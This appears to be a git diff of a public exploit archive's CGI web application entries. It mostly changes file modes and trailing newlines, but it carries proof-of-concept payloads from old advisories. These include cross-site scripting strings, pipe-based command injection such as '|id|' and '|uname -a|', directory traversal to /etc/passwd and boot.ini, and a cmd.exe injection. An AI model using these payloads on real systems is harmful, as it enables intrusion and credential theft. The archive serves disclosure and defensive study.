a/platforms/cgi/webapps/25051.txt b/platforms/cgi/webapps/25051.txt old mode 100755 new mode 100644 index 93569bf4d..a278b8fae --- a/platforms/cgi/webapps/25051.txt +++ b/platforms/cgi/webapps/25051.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/12097/info WPKontakt is reported prone to a potential script execution vulnerability. It is reported that this issue may allow remote attackers to execute arbitrary script code on a vulnerable computer, which may lead to various attacks. Arbitrary script code may be executed on a target system in the event that a specially message containing a specially malformed email address containing a JavaScript URI is received. -test@"style="background-image:url(javascript:alert(%22You%20are%20owned!%22>))".wp.pl \ No newline at end of file +test@"style="background-image:url(javascript:alert(%22You%20are%20owned!%22>))".wp.pl \ No newline at end of file diff --git a/platforms/cgi/webapps/25067.txt b/platforms/cgi/webapps/25067.txt old mode 100755 new mode 100644 index 4813f2580..557d4047d --- a/platforms/cgi/webapps/25067.txt +++ b/platforms/cgi/webapps/25067.txt @@ -12,4 +12,4 @@ http://www.example.com/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('tes http://www.example.com/WebAdmin/modalframe.wdm?file=http://other_server/page.wdm The following proof of concept demonstrates the access validation issue: -http://www.example.com/WebAdmin/useredit_account.wdm?user=otheruser@domain \ No newline at end of file +http://www.example.com/WebAdmin/useredit_account.wdm?user=otheruser@domain \ No newline at end of file diff --git a/platforms/cgi/webapps/25096.txt b/platforms/cgi/webapps/25096.txt old mode 100755 new mode 100644 index f2a9bc881..14eb30a62 --- a/platforms/cgi/webapps/25096.txt +++ b/platforms/cgi/webapps/25096.txt @@ -5,4 +5,4 @@ A remote information disclosure vulnerability reportedly affects AWStats. This i An attacker may leverage this issue to gain access to potentially sensitive data, possibly facilitating further attacks against an affected computer. http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?debug=1 -http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?debug=2 \ No newline at end of file +http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?debug=2 \ No newline at end of file diff --git a/platforms/cgi/webapps/25108.txt b/platforms/cgi/webapps/25108.txt old mode 100755 new mode 100644 index d780220e7..b57bfd2b8 --- a/platforms/cgi/webapps/25108.txt +++ b/platforms/cgi/webapps/25108.txt @@ -6,4 +6,4 @@ Specifically, the user-specified 'logfile' URI parameter is supplied to the Perl AWStats versions 5.4 to 6.1 are reported vulnerable to this issue. -http://www.example.com/cgi-bin/awstats.pl?update=1&logfile=|/bin/ls| \ No newline at end of file +http://www.example.com/cgi-bin/awstats.pl?update=1&logfile=|/bin/ls| \ No newline at end of file diff --git a/platforms/cgi/webapps/25147.txt b/platforms/cgi/webapps/25147.txt old mode 100755 new mode 100644 index 4389af37e..240e048eb --- a/platforms/cgi/webapps/25147.txt +++ b/platforms/cgi/webapps/25147.txt @@ -28,4 +28,4 @@ This is a test Click submit. You'll receive an email from the bizmail script, but you won't receive the normal contact email. You can check the .dat -file and see a copy of what you sent. \ No newline at end of file +file and see a copy of what you sent. \ No newline at end of file diff --git a/platforms/cgi/webapps/25201.txt b/platforms/cgi/webapps/25201.txt old mode 100755 new mode 100644 index a23e82a81..aeebabe35 --- a/platforms/cgi/webapps/25201.txt +++ b/platforms/cgi/webapps/25201.txt @@ -4,4 +4,4 @@ NewsScript is reported prone to an access validation vulnerability. This issue m It is reported that an attacker can exploit this issue by issuing a specially crafted HTTP GET request for the 'newsscript.pl' script to bypass access checks and carry out administrative tasks. -www.example.com/newsscript.pl?mode=admin \ No newline at end of file +www.example.com/newsscript.pl?mode=admin \ No newline at end of file diff --git a/platforms/cgi/webapps/25331.txt b/platforms/cgi/webapps/25331.txt old mode 100755 new mode 100644 index bf6b42b20..4cbf3990c --- a/platforms/cgi/webapps/25331.txt +++ b/platforms/cgi/webapps/25331.txt @@ -25,4 +25,4 @@ Proxy-Connection: Keep-Alive User-Agent: BadGuy Host: 192.168.168.168 Content-Length: 160 -Pragma: no-cache uName=</TD><script>alert("Its_not_magic..._its_a_sonic")</script>&pass=NiceTry&Submit=Login&clientHash=bbe63bb858b02e741d2d12023ee350a1 \ No newline at end of file +Pragma: no-cache uName=</TD><script>alert("Its_not_magic..._its_a_sonic")</script>&pass=NiceTry&Submit=Login&clientHash=bbe63bb858b02e741d2d12023ee350a1 \ No newline at end of file diff --git a/platforms/cgi/webapps/25350.txt b/platforms/cgi/webapps/25350.txt old mode 100755 new mode 100644 index a8074f428..57b88e053 --- a/platforms/cgi/webapps/25350.txt +++ b/platforms/cgi/webapps/25350.txt @@ -7,4 +7,4 @@ A remote attacker may exploit this issue to have arbitrary script and HTML code WebWasher CSM 4.4.1 (Build 752) is reported prone to this issue, other versions might also be affected. http://www.example.com:9090/conf?navTo1=Rep&navTo2=Dean"><script>alert("Welcome%20to%20Webwasher");alert("Script%20Code%20will%20be%20executed")</script>on&userId=default&foo -=1549218 \ No newline at end of file +=1549218 \ No newline at end of file diff --git a/platforms/cgi/webapps/25592.txt b/platforms/cgi/webapps/25592.txt old mode 100755 new mode 100644 index 6a2b56b94..75c0100e8 --- a/platforms/cgi/webapps/25592.txt +++ b/platforms/cgi/webapps/25592.txt @@ -4,4 +4,4 @@ WebCrossing is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/webx?@[code] \ No newline at end of file +http://www.example.com/webx?@[code] \ No newline at end of file diff --git a/platforms/cgi/webapps/25594.txt b/platforms/cgi/webapps/25594.txt old mode 100755 new mode 100644 index 9631187a0..8d7331ff1 --- a/platforms/cgi/webapps/25594.txt +++ b/platforms/cgi/webapps/25594.txt @@ -8,4 +8,4 @@ Links versions 2.x, and 2.2.x, as well as Links-SQL version 3.0 are all reported http://www.example.com/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate http://www.example.com/user.cgi?url="><iframe%20src="http://www.example2.com/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height -+="3000"%20frameborder="No"></iframe><!--&from=rate \ No newline at end of file ++="3000"%20frameborder="No"></iframe><!--&from=rate \ No newline at end of file diff --git a/platforms/cgi/webapps/25622.txt b/platforms/cgi/webapps/25622.txt old mode 100755 new mode 100644 index f06629235..d02a46d9e --- a/platforms/cgi/webapps/25622.txt +++ b/platforms/cgi/webapps/25622.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue is reported to affect MegaBook version 2.0; other versions may also be vulnerable. -http://www.example.com/admin.cgi?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt; \ No newline at end of file +http://www.example.com/admin.cgi?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt; \ No newline at end of file diff --git a/platforms/cgi/webapps/25632.txt b/platforms/cgi/webapps/25632.txt old mode 100755 new mode 100644 index 57d1e3b3a..e45b57954 --- a/platforms/cgi/webapps/25632.txt +++ b/platforms/cgi/webapps/25632.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/13551/info Easy Message Board is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. -http://www.example/com/cgi-bin/emsgb/easymsgb.pl?print=../../../../../../../../etc/passwd \ No newline at end of file +http://www.example/com/cgi-bin/emsgb/easymsgb.pl?print=../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/25634.txt b/platforms/cgi/webapps/25634.txt old mode 100755 new mode 100644 index 7dadbf560..d7149f089 --- a/platforms/cgi/webapps/25634.txt +++ b/platforms/cgi/webapps/25634.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/13555/info Easy Message Board is prone to a remote command execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. -http://www.example.com/cgi-bin/emsgb/easymsgb.pl?print=|id| \ No newline at end of file +http://www.example.com/cgi-bin/emsgb/easymsgb.pl?print=|id| \ No newline at end of file diff --git a/platforms/cgi/webapps/25649.txt b/platforms/cgi/webapps/25649.txt old mode 100755 new mode 100644 index 1ab1f05fe..6a4d892d4 --- a/platforms/cgi/webapps/25649.txt +++ b/platforms/cgi/webapps/25649.txt @@ -6,4 +6,4 @@ ShowOff! Digital Media Software 1.5.4 is reportedly vulnerable. Other versions m http://www.example.com/ShowAlbum?ShowDetails&1&nocount&/../../../../../../../../../../[file] http://www.example.com/ShowVideo?1&fullnocount&/../../../../../../../../../../[file] -http://www.example.com/ShowGraphic?/../../../../../../../../[file] \ No newline at end of file +http://www.example.com/ShowGraphic?/../../../../../../../../[file] \ No newline at end of file diff --git a/platforms/cgi/webapps/25666.txt b/platforms/cgi/webapps/25666.txt old mode 100755 new mode 100644 index a9c4da894..f7377439d --- a/platforms/cgi/webapps/25666.txt +++ b/platforms/cgi/webapps/25666.txt @@ -6,4 +6,4 @@ When handling a specially-crafted URI request, the application discloses the sou Information gathered through this attack could be used to launch further attacks against a system. -http://www.example.com/somedir/../cgi-bin/test.pl \ No newline at end of file +http://www.example.com/somedir/../cgi-bin/test.pl \ No newline at end of file diff --git a/platforms/cgi/webapps/25668.txt b/platforms/cgi/webapps/25668.txt old mode 100755 new mode 100644 index c71a58c72..47e9ee42b --- a/platforms/cgi/webapps/25668.txt +++ b/platforms/cgi/webapps/25668.txt @@ -8,4 +8,4 @@ http://www.example.com/scripts/sigmaweb.dll username: a very long sting of codes and data like: -: /' /'.' por //":>>?>>??>+_+_)()((**&^%^%%$#!?><>><><?/?""""''':L:L"">:":. \ No newline at end of file +: /' /'.' por //":>>?>>??>+_+_)()((**&^%^%%$#!?><>><><?/?""""''':L:L"">:":. \ No newline at end of file diff --git a/platforms/cgi/webapps/25817.txt b/platforms/cgi/webapps/25817.txt old mode 100755 new mode 100644 index fd8cec210..a069f45dc --- a/platforms/cgi/webapps/25817.txt +++ b/platforms/cgi/webapps/25817.txt @@ -8,4 +8,4 @@ This can lead to various attacks including unauthorized access to an affected co JamMail 1.8 is affected by this issue. -http://www.example.com/cgi-bin/jammail.pl?job=showoldmail&mail=|command| \ No newline at end of file +http://www.example.com/cgi-bin/jammail.pl?job=showoldmail&mail=|command| \ No newline at end of file diff --git a/platforms/cgi/webapps/25918.txt b/platforms/cgi/webapps/25918.txt old mode 100755 new mode 100644 index f80b8941d..d7f1581c1 --- a/platforms/cgi/webapps/25918.txt +++ b/platforms/cgi/webapps/25918.txt @@ -6,4 +6,4 @@ Specifically, an attacker can supply arbitrary commands prefixed with the '|' ch This issue is reported to affect imTRBBS version 1.02; other versions may also be vulnerable. -http://www.example.com/cgi-bin/im_trbbs.cgi?uid=parameter&df=bbs.dat|ls| \ No newline at end of file +http://www.example.com/cgi-bin/im_trbbs.cgi?uid=parameter&df=bbs.dat|ls| \ No newline at end of file diff --git a/platforms/cgi/webapps/25920.pl b/platforms/cgi/webapps/25920.pl index 383dc55e1..55a23f5c6 100755 --- a/platforms/cgi/webapps/25920.pl +++ b/platforms/cgi/webapps/25920.pl @@ -74,4 +74,4 @@ while ( <$sock> ) ++$lE; } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/cgi/webapps/25939.txt b/platforms/cgi/webapps/25939.txt old mode 100755 new mode 100644 index 2bc541173..27cba5902 --- a/platforms/cgi/webapps/25939.txt +++ b/platforms/cgi/webapps/25939.txt @@ -8,4 +8,4 @@ This issue may facilitate unauthorized remote access in the context of the Web s GlobalNoteScript 4.20 and prior versions are affected. -http://www.example.com/cgi-bin/bbs/read.cgi?file=|uname%20-a|&bbs_id=00001 \ No newline at end of file +http://www.example.com/cgi-bin/bbs/read.cgi?file=|uname%20-a|&bbs_id=00001 \ No newline at end of file diff --git a/platforms/cgi/webapps/25952.txt b/platforms/cgi/webapps/25952.txt old mode 100755 new mode 100644 index 6c14b459e..a33076644 --- a/platforms/cgi/webapps/25952.txt +++ b/platforms/cgi/webapps/25952.txt @@ -7,4 +7,4 @@ Reportedly, this issue arises when the user-specified values are passed to the ' This issue may facilitate unauthorized remote access in the context of the Web server to the affected computer. http://www.example.com/cgi-bin/kaiseki.cgi?file.exetension|command| -http://www.example.com/cgi-bin/kaiseki.cgi?|command| \ No newline at end of file +http://www.example.com/cgi-bin/kaiseki.cgi?|command| \ No newline at end of file diff --git a/platforms/cgi/webapps/26017.txt b/platforms/cgi/webapps/26017.txt old mode 100755 new mode 100644 index 0cf1e0a24..87dc7e7cc --- a/platforms/cgi/webapps/26017.txt +++ b/platforms/cgi/webapps/26017.txt @@ -11,4 +11,4 @@ These vulnerabilities allow remote attackers to retrieve the contents of arbitra http://diveintogreasemonkey.org/experiments/function-leak.html http://diveintogreasemonkey.org/experiments/script-leak.html http://diveintogreasemonkey.org/experiments/xmlhttprequest-leak.html -http://diveintogreasemonkey.org/experiments/localfile-leak.html \ No newline at end of file +http://diveintogreasemonkey.org/experiments/localfile-leak.html \ No newline at end of file diff --git a/platforms/cgi/webapps/26046.txt b/platforms/cgi/webapps/26046.txt old mode 100755 new mode 100644 index 669a1a9fd..ccf67565e --- a/platforms/cgi/webapps/26046.txt +++ b/platforms/cgi/webapps/26046.txt @@ -16,4 +16,4 @@ http://www.example.com/compose.pl?func=new&To=lala@lala.es[XSS-CODE]&Cc=&Bcc= http://www.example.com/webadmin/filter.pl?func=viewmailrelay&Order=IPaddress[XSS-CODE] http://www.example.com/webadmin/filter.pl?func=filter&Header=blacklist_from&Type=1[XSS-CODE]&View=1 http://www.example.com/webadmin/filter.pl?func=filter&Header=blacklist_from[XSS-CODE]&Type=1&View=1 -http://www.example.com/webadmin/filter.pl?func=filter&Header=whitelist_from&Type=0&Display=1&Sort=value[XSS-CODE]&Type=1&View=1 \ No newline at end of file +http://www.example.com/webadmin/filter.pl?func=filter&Header=whitelist_from&Type=0&Display=1&Sort=value[XSS-CODE]&Type=1&View=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/26066.txt b/platforms/cgi/webapps/26066.txt old mode 100755 new mode 100644 index 77461683f..9cf4f5e45 --- a/platforms/cgi/webapps/26066.txt +++ b/platforms/cgi/webapps/26066.txt @@ -9,4 +9,4 @@ http://www.example.com/test.ks/raw_input http://www.example.com/test.ks/file?%22*10000000&mode=w The following example will create a file on the local filesystem on the hosting computer: -http://www.example.com/test.ks/file?%22*2&mode=w \ No newline at end of file +http://www.example.com/test.ks/file?%22*2&mode=w \ No newline at end of file diff --git a/platforms/cgi/webapps/26256.txt b/platforms/cgi/webapps/26256.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26289.txt b/platforms/cgi/webapps/26289.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26290.txt b/platforms/cgi/webapps/26290.txt old mode 100755 new mode 100644 index e75b5400a..e90096b99 --- a/platforms/cgi/webapps/26290.txt +++ b/platforms/cgi/webapps/26290.txt @@ -11,4 +11,4 @@ http://www.example.com/[path]/perldiver.pl?testhere<SCRIPT>alert(document.domain version 2.x ------ -http://www.example.com/[path]/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script> \ No newline at end of file +http://www.example.com/[path]/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/26344.txt b/platforms/cgi/webapps/26344.txt old mode 100755 new mode 100644 index 866624b08..b0156e121 --- a/platforms/cgi/webapps/26344.txt +++ b/platforms/cgi/webapps/26344.txt @@ -4,4 +4,4 @@ WebGUI is prone to an arbitrary command execution vulnerability. This is due to This issue can facilitate unauthorized remote access. -http://www.example.com/WebGUI/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60; \ No newline at end of file +http://www.example.com/WebGUI/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60; \ No newline at end of file diff --git a/platforms/cgi/webapps/26398.txt b/platforms/cgi/webapps/26398.txt old mode 100755 new mode 100644 index deb9a45c9..d401cbe78 --- a/platforms/cgi/webapps/26398.txt +++ b/platforms/cgi/webapps/26398.txt @@ -4,4 +4,4 @@ RSA ACE Agent is prone to a cross-site scripting vulnerability because the appli An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/webauthentication?GetPic?image=x%3Cimg%20src=%22A%22+onError=%22javascript:alert('Thanks%20for%20turning%20on%20the%20remotecontrol')%3b%22%3Exxx \ No newline at end of file +http://www.example.com/webauthentication?GetPic?image=x%3Cimg%20src=%22A%22+onError=%22javascript:alert('Thanks%20for%20turning%20on%20the%20remotecontrol')%3b%22%3Exxx \ No newline at end of file diff --git a/platforms/cgi/webapps/26461.txt b/platforms/cgi/webapps/26461.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26462.txt b/platforms/cgi/webapps/26462.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26463.txt b/platforms/cgi/webapps/26463.txt old mode 100755 new mode 100644 index c340f80a3..33f5fc8d1 --- a/platforms/cgi/webapps/26463.txt +++ b/platforms/cgi/webapps/26463.txt @@ -25,4 +25,4 @@ document.forms[0].submit(); <script type="text/javascript"> document.forms[0].submit(); -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/26475.txt b/platforms/cgi/webapps/26475.txt old mode 100755 new mode 100644 index b5f48859a..16b40d7af --- a/platforms/cgi/webapps/26475.txt +++ b/platforms/cgi/webapps/26475.txt @@ -4,4 +4,4 @@ Asterisk is prone to an unauthorized-access vulnerability. This issue is due to Successful exploitation will grant an attacker access to a victim user's voicemail and to any '.wav/.WAV' files currently on the affected system. -http://www.example.org/cgi-bin/vmail.cgi?action=audio&folder=../201/INBOX&mailbox=200&context=default&password=12345&msgid=0001&format=wav \ No newline at end of file +http://www.example.org/cgi-bin/vmail.cgi?action=audio&folder=../201/INBOX&mailbox=200&context=default&password=12345&msgid=0001&format=wav \ No newline at end of file diff --git a/platforms/cgi/webapps/26506.txt b/platforms/cgi/webapps/26506.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26507.txt b/platforms/cgi/webapps/26507.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26508.txt b/platforms/cgi/webapps/26508.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26509.txt b/platforms/cgi/webapps/26509.txt old mode 100755 new mode 100644 index 60164be75..2d7318426 --- a/platforms/cgi/webapps/26509.txt +++ b/platforms/cgi/webapps/26509.txt @@ -9,4 +9,4 @@ Other attacks are also possible. Walla Telesite version 3.0 is affected; earlier versions are also affected. http://www.example.com/ts.cgi?c:\boot.ini -http://www.example.com/ts.cgi?c:\boot1.ini \ No newline at end of file +http://www.example.com/ts.cgi?c:\boot1.ini \ No newline at end of file diff --git a/platforms/cgi/webapps/26550.txt b/platforms/cgi/webapps/26550.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26551.txt b/platforms/cgi/webapps/26551.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26552.txt b/platforms/cgi/webapps/26552.txt old mode 100755 new mode 100644 index 0b70de294..384aac592 --- a/platforms/cgi/webapps/26552.txt +++ b/platforms/cgi/webapps/26552.txt @@ -5,4 +5,4 @@ OTRS is prone to multiple input-validation vulnerabilities. These issues are due The application is prone to multiple SQL-injection vulnerabilities, an HTML-injection vulnerability, and multiple cross-site scripting vulnerabilities. http://www.example.com/index.pl?QueueID=%22%3E%3Cscript%3Ealert('[XSS_HERE]')%3B%3C/script%3E%3Cx%20y=%22 -http://www.example.com/index.pl?Action="><script>alert(document.title);</script><x%20" \ No newline at end of file +http://www.example.com/index.pl?Action="><script>alert(document.title);</script><x%20" \ No newline at end of file diff --git a/platforms/cgi/webapps/26716.txt b/platforms/cgi/webapps/26716.txt old mode 100755 new mode 100644 index 8be018281..dbcaa2685 --- a/platforms/cgi/webapps/26716.txt +++ b/platforms/cgi/webapps/26716.txt @@ -4,4 +4,4 @@ Easy Search System is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/search.cgi?q=[XSS] \ No newline at end of file +http://www.example.com/search.cgi?q=[XSS] \ No newline at end of file diff --git a/platforms/cgi/webapps/26721.txt b/platforms/cgi/webapps/26721.txt old mode 100755 new mode 100644 index 1ce849560..ab367c752 --- a/platforms/cgi/webapps/26721.txt +++ b/platforms/cgi/webapps/26721.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Versions 1.80 and prior are affected; other versions may also be vulnerable. -http://www.example.com/1search.cgi?q=[XSS]&boolean=ALL&case=Insensitive \ No newline at end of file +http://www.example.com/1search.cgi?q=[XSS]&boolean=ALL&case=Insensitive \ No newline at end of file diff --git a/platforms/cgi/webapps/26761.txt b/platforms/cgi/webapps/26761.txt old mode 100755 new mode 100644 index 9a1bba0df..eec3d7d3d --- a/platforms/cgi/webapps/26761.txt +++ b/platforms/cgi/webapps/26761.txt @@ -4,4 +4,4 @@ It is possible for remote attackers to gain control of a target TrueMobile 2300 http://target/apply.cgi?Page=adv_password.asp&action=ClearLog -A dialog requesting credentials may appear. The action will be performed, even if "cancel" is clicked. \ No newline at end of file +A dialog requesting credentials may appear. The action will be performed, even if "cancel" is clicked. \ No newline at end of file diff --git a/platforms/cgi/webapps/26771.txt b/platforms/cgi/webapps/26771.txt old mode 100755 new mode 100644 index 16457d036..af345086e --- a/platforms/cgi/webapps/26771.txt +++ b/platforms/cgi/webapps/26771.txt @@ -4,4 +4,4 @@ Nortel SSL VPN is prone to an input validation vulnerability. This issue could b Nortel SSL VPN 4.2.1.6 is vulnerable to this issue; other versions may also be affected. -https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start... \ No newline at end of file +https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start... \ No newline at end of file diff --git a/platforms/cgi/webapps/26786.txt b/platforms/cgi/webapps/26786.txt old mode 100755 new mode 100644 index 75ad78bca..b0439f201 --- a/platforms/cgi/webapps/26786.txt +++ b/platforms/cgi/webapps/26786.txt @@ -4,4 +4,4 @@ EveryAuction is prone to a cross-site scripting vulnerability because it fails t An attacker may leverage this issue to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/path/auction.pl?searchstring=[XSS]&action=search&searchtype=keyword \ No newline at end of file +http://www.example.com/path/auction.pl?searchstring=[XSS]&action=search&searchtype=keyword \ No newline at end of file diff --git a/platforms/cgi/webapps/26842.txt b/platforms/cgi/webapps/26842.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26843.txt b/platforms/cgi/webapps/26843.txt old mode 100755 new mode 100644 index d03975a6c..f7ac5068d --- a/platforms/cgi/webapps/26843.txt +++ b/platforms/cgi/webapps/26843.txt @@ -4,4 +4,4 @@ SiteNet BBS is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://example.com/search.cgi?cid=[XSS] \ No newline at end of file +http://example.com/search.cgi?cid=[XSS] \ No newline at end of file diff --git a/platforms/cgi/webapps/26845.txt b/platforms/cgi/webapps/26845.txt old mode 100755 new mode 100644 index f65c92f36..e534ef819 --- a/platforms/cgi/webapps/26845.txt +++ b/platforms/cgi/webapps/26845.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in /atl.cgi?ct=a8&md=search&brf=&before=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E -/atl.cgi?ct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +/atl.cgi?ct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/26846.txt b/platforms/cgi/webapps/26846.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26847.txt b/platforms/cgi/webapps/26847.txt old mode 100755 new mode 100644 index 2db3c9c16..c3295a45c --- a/platforms/cgi/webapps/26847.txt +++ b/platforms/cgi/webapps/26847.txt @@ -4,4 +4,4 @@ eDatCat is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/EDCstore.pl?user_action=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +http://www.example.com/EDCstore.pl?user_action=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/26848.txt b/platforms/cgi/webapps/26848.txt old mode 100755 new mode 100644 index 8740a2d7b..e5467feab --- a/platforms/cgi/webapps/26848.txt +++ b/platforms/cgi/webapps/26848.txt @@ -8,4 +8,4 @@ http://www.example.com/index.cgi?c=search&s=ok&id=191&kword=%22%3E%3Cscript%3Eal http://www.example.com/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=&max=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E http://www.example.com/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E http://www.example.com/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E -http://www.example.com/index.cgi?c=search&s=ok&id=191&kword=&f=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/index.cgi?c=search&s=ok&id=191&kword=&f=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/26849.txt b/platforms/cgi/webapps/26849.txt old mode 100755 new mode 100644 index a03402ff0..ce686e4eb --- a/platforms/cgi/webapps/26849.txt +++ b/platforms/cgi/webapps/26849.txt @@ -11,4 +11,4 @@ http://www.example.com/cart.cgi?action=search&category=%22%3E%3Cs cript%3Ealert('r0t')%3C/script%3E http://www.example.com/cart.cgi?action=link&product=33&uid=%22%3E -%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/26850.txt b/platforms/cgi/webapps/26850.txt old mode 100755 new mode 100644 index 92d324b00..382a6a4ee --- a/platforms/cgi/webapps/26850.txt +++ b/platforms/cgi/webapps/26850.txt @@ -9,4 +9,4 @@ http://www.example.com/ppcal.cgi?action=shop&user=8001&start=21 /script%3E http://www.example.com/ppcal.cgi?action=shop&user=%22%3E%3Cscri -pt%3Ealert('r0t')%3C/script%3E \ No newline at end of file +pt%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/26851.txt b/platforms/cgi/webapps/26851.txt old mode 100755 new mode 100644 index c71141839..0e20c8a16 --- a/platforms/cgi/webapps/26851.txt +++ b/platforms/cgi/webapps/26851.txt @@ -4,4 +4,4 @@ Kryptronic ClickCartPro is prone to a cross-site scripting vulnerability. This i An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/cp-app.cgi?usr=51H4515590&rnd=577308&rrc=N&affl=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +http://www.example.com/cp-app.cgi?usr=51H4515590&rnd=577308&rrc=N&affl=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/26852.txt b/platforms/cgi/webapps/26852.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26858.txt b/platforms/cgi/webapps/26858.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26859.txt b/platforms/cgi/webapps/26859.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26860.txt b/platforms/cgi/webapps/26860.txt old mode 100755 new mode 100644 index a95bcf0b2..fcf8a144c --- a/platforms/cgi/webapps/26860.txt +++ b/platforms/cgi/webapps/26860.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in This issue affects version 0.2.5; earlier versions may also be vulnerable. -http://www.example.com/toc.pl?board=[XSS]&[member]=yes \ No newline at end of file +http://www.example.com/toc.pl?board=[XSS]&[member]=yes \ No newline at end of file diff --git a/platforms/cgi/webapps/26861.txt b/platforms/cgi/webapps/26861.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26862.txt b/platforms/cgi/webapps/26862.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26863.txt b/platforms/cgi/webapps/26863.txt old mode 100755 new mode 100644 index 2c7122e1d..ba0c6122b --- a/platforms/cgi/webapps/26863.txt +++ b/platforms/cgi/webapps/26863.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in These issues affect version 2.13; other versions may also be vulnerable. -http://www.example.com/post.cgi?action=new&forum=[XSS] \ No newline at end of file +http://www.example.com/post.cgi?action=new&forum=[XSS] \ No newline 